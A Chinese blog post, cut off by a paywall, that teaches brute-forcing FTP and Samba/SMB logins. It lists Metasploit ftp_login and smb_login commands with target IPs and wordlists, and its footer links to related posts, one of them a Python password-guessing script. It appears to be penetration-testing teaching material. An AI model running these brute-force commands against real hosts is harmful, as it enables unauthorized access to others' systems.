主机与数据库安全

最新推荐文章于 2024-08-09 11:03:09 发布
最新推荐文章于 2024-08-09 11:03:09 发布
阅读量190 收藏
点赞数
文章标签: 服务器 网络 linux 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75056154/article/details/129921303
版权

主机与数据库安全

主机共享端口及漏洞利用/检测

FTP服务

端口: 21
  FTP是File Transfer Protocol (文议) 的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是件传输协一个应用程序( Application )。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一-种协议以传输文件。

直接访问ftp://xx.xx.xxxx

FTP暴力破解

ftp的爆破工具有很多,常见的暴力破解工具有hydra、medusa 超级弱口令爆破工具等,推荐使用msf中的ftp模块、超级弱口令爆破工具

use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.109.134
set USER_ FILE /home/dic/dic_username_ ftp.txt
set PASS_ FILE /home/dic/dic_ password_ ftp.txt
set THREADS 30
run

Samba概述

默认端口: 137、135、139、 445等
  Samba是linux和unix系统上实现smb协议的一个免费软件,由服务器及客户端程序构成Samba服务:对于这个可以在windows与Linux之间进行共享文件的服务同样是我们攻击的关注点; samba登录分为两种方式,一种是需要用户名口令; 另- -种是不需要用户名口令。在很多时候不光是pc机,还有一-些服务器, 网络设备都开放着此服务,方便进行文件共享,但是同时也给攻击者提供了便利。

默认端口: 445
  SMB(Server Message Block) Windows协议族,用于文件和打印共享服务。

Samba暴力破解

msf > use auxiliary/scanner/smb/smb_login (使用smb_login模块)

msf auxiliary(smb_ login) > show options (查看选项)

msf auxiliary(smb_ login) > set RHOSTS 10.180.100.10 (目标)

msf auxiliary(ssmb_ login) > set U

最低0.47元/天 解锁文章
m0_75056154
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
弱口令爆破工具的使用
m0_51999974的博客
05-26 1702
使用ftp工具在本机部署ftp服务 为ftp服务设置用户名为admin,密码为admin@123 打开弱口令检查工具,选择ftp破解 在目标框中填写主机IP地址 ...
FTP弱口令渗透测试
明裕学长的博客
05-24 2993
任务环境说明: 服务器场景:Windows 服务器场景操作系统:Windows(版本不详) 渗透机环境说明: BT5渗透机用户名:root密码:toor Kali渗透机用户名:root密码:toor Windows7渗透机用户名:administrator密码:123456 靶机场景Windows--1 172.16.105.249 1.在BT5中使用Zenmap工具扫描服务器场景Windows所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、2
Metasploitable2靶机渗透
D-R0s1的博客
04-13 9208
Metasploitable2介绍    Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中...
FTP匿名登录或弱口令漏洞及服务加固
05-27 3355
漏洞描述 FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。 漏洞危害 黑客利用弱口令或匿名登录漏洞直接登录 FTP 服务,上传恶意文件,从而获取系统权限,并可能造成数据泄露。 加固方案 不同 FTP 服务软件可能有不同的防护程序,本修复方...
弱口令扫描工具mysql ftp_基于端口的弱口令检测工具--iscan
weixin_39922147的博客
02-12 1056
iscan: 基于端口的弱口令检测工具亲手打造了一款基于端口的弱口令检测工具,使用python进行编写,主要可以用于渗透测试中常见服务端口弱口令的检测。目前支持以下服务:系统弱口令ftp、ssh、telnet、ipc$数据库弱口令:mssql、mysql、postgre、mongodb中间件弱口令:phpmyadmin、tomcat、weblogic 特点命令行,兼容OSX/LINUX/WIND...
Oracle主机数据库安全检查流程
02-26
Oracle主机数据库安全检查流程,主机安全配置,服务器安全配置等模板
保护你的Sqlite数据库(SQLite数据库安全秘籍)
09-11
然而,正如标题和描述中提到的,SQLite数据库的安全问题不容忽视,特别是当它们与PHP等Web语言结合使用时。 防止SQLite数据库被非法下载是确保数据安全的关键步骤。以下是一些实用的方法: 1. **改变数据库存储...
主机数据库安全配置.pptx
09-30
主机数据库安全配置.pptx
数据库系统安全PPT课件.ppt
11-24
* 数据库安全的意义:数据库是当今信息存储的一个重要形式,数据库系统已经被广泛的应用于政府、军事、金融等众多领域。如果对与针对数据库的攻击不加以遏制,轻则干扰人们的日常生活,重则造成巨大的经济损失,甚至...
虚拟主机MySQL数据库的备份与还原的方法
09-11
总结来说,虚拟主机上的MySQL数据库备份与还原主要依靠MySQLDump工具,它可以生成跨平台的SQL文件,确保数据的安全迁移。同时,了解不同还原方法的适用场景也很重要。在实际操作中,务必谨慎处理数据库文件,避免...
windows下FTP匿名登录或弱口令漏洞及服务加固
01-10
漏洞描述 FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。 漏洞危害 黑客利用弱口令或匿名登录漏洞直接登录 FTP 服务,上传恶意文件,从而获取系统权限,并可能造成数据泄露。 加固方案 不同 FTP 服务软件可能有不同的防护程序,本修复方案以 Windows server 2008 中自带的 FTP 服务和 Linux 中的vsftpd服务为例,您可参考以下方案对您的 FTP 服务进行安全加固。 重要提示: 请确保您的 FTP 服务软件为官方最新版本。同
FTP弱命令渗透测试
weixin_63787130的博客
03-22 553
FTP弱命令渗透测试
FTP暴力破解登陆漏洞复现(Windows Server 2003)
顾蒅' Home
08-25 6707
FTP暴力破解漏洞复现 0x01 漏洞简述 FTP弱口令,一般指使用FTP的用户的密码长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。 知道FTP弱口令,可以通过该漏洞获取主机文件系统信息。 0x02 风险等级 漏洞评定结果如下: 评定方式 等级 威胁等级 严重 影响面 广泛 0x03 漏洞详情 FTP文件传输协议(File Transfer Protocol)的缩写,是用于在网络上进行文件传输的一套标准协议,它工作在 OSI 模型
FTP弱口令猜解【python脚本】
12-07 1454
ftp弱口令猜解  python脚本: #! /usr/bin/env python # _*_ coding:utf-8 _*_ import ftplib,time username_list=['root','ftp','admin'] password_list=['root','123','ftp','oracle'] def ftp(ip,po...
ftp弱密码案例
weixin_30725467的博客
09-19 658
转载于:https://www.cnblogs.com/qmfsun/p/7552594.html
web入侵二之弱口令攻击及其他
热门推荐
jiangliuzheng的专栏
12-30 1万+
一、什么是弱口令   就是说由常用数字、字母、字符等组合成的,容易被别人通过简单及平常的思维方式就能猜到的密码,利用弱口令结合计算机系统等漏洞可以做到入侵的事半功倍的效果   二、共享入侵--IPC$     IPC$是共享“命名管道”资源,它是为了让进程间通信而开放的命令管道,可以通过验证用户名和密码获取相应的权限,在远程管理计算机和查看计算机的共享资源是使用,利用IPC$,攻击者甚至可
挖矿木马攻破了服务器
最新发布
中年程序员一枚的博客
08-09 1195
systemctl status 6058 # 6058为病毒的PID。然后干掉,或者权限屏蔽等都可以,只要不执行,就没有危险!过一分钟后,服务又开始狂刷cpu。最近被国外的挖矿木马攻破了服务器。#top 看看什么占用cpu高。第四步根据pid查到服务地址。#last指令查看登录ip。第三步杀死狂刷CPU的服务。
linux 目录详解
zhanglinlang的专栏
08-08 554
名称 作用 / 根目录系统的起点,跟目录下只放目录不要直接文件 /bin 存放所有用户都可以使用的Linux基本操作命令(如ls、cp、mkdir等)。这些命令通常是用于系统管理和日常操作的常用工具 /sbin 存放系统管理相关的二进制文件,这些文件通常是系统管理员使用的命令,如fdisk、shutdown、mount等。与/bin目录不同的是,/sbin目录中的命令普通用户通常只能查看而不能执行。 /boot 存放引导相关文件,如Linux内核文件(vmlinuz)和引导装载
服务器硬件及RAID配置
2401_83958584的博客
08-08 327
为是多个硬盘组合成一个,故可并行写操作,写入速度提高,但此方式硬盘数据没有冗余,最少由三个硬盘组成,它将数据分散存储于阵列中的每个硬盘,并且还伴有一。个数据校验位,数据位与校验位通过算法能相互验证,当丢失其中的一位时,读操作速度有所提高,写操作理论上与单硬盘速度一样,但由于数据需。,它将两个或多个硬盘组成一个逻辑硬盘,容量是所有硬盘之和,因。,它最少由两个硬盘组成,且两个硬盘上存储的数据均相同,以实现。没有容错,一旦一个物理硬盘损坏,则所有数据均丢失。是先将数据进行镜像操作,然后再对数据进行分组,
数据库安全:模型、机制与目标解析
"数据库安全模型与机制.ppt" 数据库安全模型与机制是计算机科学中的关键组成部分,尤其是对于保护敏感数据和确保信息系统的稳定性至关重要。数据库安全的目标主要包括三个方面:完整性、保密性和可用性。 **完整性...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值